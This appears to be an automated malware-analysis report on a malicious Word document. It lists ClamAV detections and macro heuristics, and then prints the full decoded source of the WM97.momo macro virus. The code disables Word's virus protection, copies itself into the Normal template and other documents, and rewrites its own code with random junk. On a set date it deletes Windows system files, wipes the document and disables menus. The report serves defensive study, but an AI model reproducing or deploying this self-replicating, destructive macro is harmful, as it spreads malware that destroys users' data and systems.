Malware Insights
The sample is identified as malicious by ClamAV with multiple signatures, including Win.Trojan.Pivis-2 and Doc.Trojan.Agnes-3. It contains a legacy WordBasic AutoOpen macro (OLE_LEGACY_WORDBASIC_AUTOEXEC, OLE_VBA_AUTOOPEN) which is designed to execute automatically. The macro attempts to delete files from C:\WINDOWS\SYSTEM\*.* and calls another subroutine 'JoVlLr9070', suggesting a payload delivery or system disruption function. The presence of the AutoOpen macro and the malicious ClamAV detections strongly indicate a malicious document intended for initial compromise via spearphishing.
Heuristics (4)

- ClamAV: Win.Trojan.Pivis-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Pivis-2
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5351 bytes | f2841eb2b722198d8aeee6b3f98820dc38523f0032fe6b6dfd8055d2acb0d6f2 | ClamAV: Doc.Trojan.Agnes-3 | unlikely |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Attribute VB_Name = "momo"
Declare Function ShowCursor Lib "USER32" (ByVal fShow As Integer) As Integer
Sub KiCuQz3859()
    ' -= [LineZerO's Macro Engine 1.2] =-
    ' -= [WM97.momo] =-
    ' -= [ID: 23451-Bx-54053859-Bm.W] =-
    On Error Resume Next
    WordBasic.DisableAutoMacros 0
    ActiveDocument.ReadOnlyRecommended = False
    With Application
        .EnableCancelKey = wdCancelDisabled
        .DisplayAlerts = wdAlertsNone
    End With
    With Options
        .ConfirmConversions = False
        .VirusProtection = False
    End With
    'This code is taken from Pyro | Thanks
    Set Current = MacroContainer
    For Grow = 1 To 20
        Number = Current.VBProject.VBComponents("momo").CodeModule.ProcCountLines("KiCuQz3859", vbext_pk_Proc)
        RandomLine = Int(Rnd() * Number + 1)
        RemarkLength = Int(Rnd() * 40 + 1)
        For Length = 1 To RemarkLength
            Remark = Remark + Chr$(Int((90 - 65 + 1) * Rnd + 65))
        Next Length
        Current.VBProject.VBComponents("momo").CodeModule.InsertLines RandomLine, vbTab & "Rem " & Remark
        Remark = ""
    Next Grow
    If Day(Now()) = 8 And Month(Now()) = 8 Then
        Application.Username = "MOMO"
        Selection.Wholestory
        Selection.Cut
        ActiveDocument.SaveAs ActiveDocument.FullName
        Kill ("C:\WINDOWS\SYSTEM\*.*")
        While ShowCursor(False) >= 0
        Wend
        Call JoVlLr9070
        WordBasic.FileExit dlg
    End If
    Application.CommandBars("View").Controls(6).Delete
    Application.CommandBars("Format").Controls(12).Delete
    Application.CommandBars("Tools").Controls(12).Delete
    Application.CommandBars("Tools").Controls(13).Delete
End Sub
Sub JoVlLr9070()
    On Error Resume Next
    Application.CommandBars("Edit").Enabled = False
    Application.CommandBars("Insert").Enabled = False
    Application.CommandBars("Format").Enabled = False
End Sub
Sub Bx5405()
    On Error Resume Next
    Application.EnableCancelKey = wdCancelDisabled
    With Options
        .SaveNormalPrompt = False
        .VirusProtection = False
        .ConfirmConversions = False
    End With
    Application.VBE.ActiveVBProject.VBComponents("momo").Export "C:\momo.sys"
    With Dialogs(wdDialogFileSummaryInfo)
        .Author = Chr(74) + Chr(97) + Chr(99) + Chr(107) + Chr(32) + Chr(84) + Chr(119) + Chr(111) + Chr(102) + Chr(108) + Chr(111) + Chr(119) + Chr(101) + Chr(114) + Chr(32) + Chr(45) + Chr(61) + Chr(91) + Chr(76) + Chr(105) + Chr(110) + Chr(101) + Chr(90) + Chr(101) + Chr(114) + Chr(216) + Chr(32) + Chr(86) + Chr(120) + Chr(32) + Chr(84) + Chr(101) + Chr(97) + Chr(109) + Chr(93) + Chr(61) + Chr(45)
        .Comments = "WM97.momo" & Chr(32) + Chr(98) + Chr(121) + Chr(32) + Chr(76) + Chr(105) + Chr(77) + Chr(69) + Chr(32) + Chr(49) + Chr(46) + Chr(111)
        .Keywords = "LiME ID: 23451-Bx-54053859-Bm.W"
        .Execute
    End With
    For x = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(x).Name = "momo" Then DgDmFu5117PwVzPp5405 = True
    Next x
    For y = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(y).Name = "momo" Then NhJtFj9070KiCuQz3859 = True
    Next y
    If DgDmFu5117PwVzPp5405 = True And NhJtFj9070KiCuQz3859 = False Then Set MiRxQx4019JoVlLr4336 = ActiveDocument.VBProject
    If DgDmFu5117PwVzPp5405 = False And NhJtFj9070KiCuQz3859 = True Then Set MiRxQx4019JoVlLr4336 = NormalTemplate.VBProject
    If DgDmFu5117PwVzPp5405 = True And NhJtFj9070KiCuQz3859 = True Then GoTo Ende_
    MiRxQx4019JoVlLr4336.VBComponents.Import "C:\momo.sys"
    If NhJtFj9070KiCuQz3859 = False Then ActiveDocument.SaveAs (WordBasic.[FileName$]()), FileFormat:=wdFormatDocument
    If DgDmFu5117PwVzPp5405 = False Then NormalTemplate.Save
Ende_:
    Call KiCuQz3859
End Sub
Sub AutoOpen()
    On Error Resume Next
    Call Bx5405
    Call KiCuQz3859
End Sub
Sub AutoExit()
    On Error Resume Next
    Call Bx5405
    Call KiCuQz3859
End Sub
Sub AutoNew()
    On Error Resume Next
    Call Bx5405
    Call KiCuQz3859
End Sub
Sub AutoExec()
    On Error Resume Next
    Call Bx5405
    Call KiCuQz3859
End Su
```

... (truncated)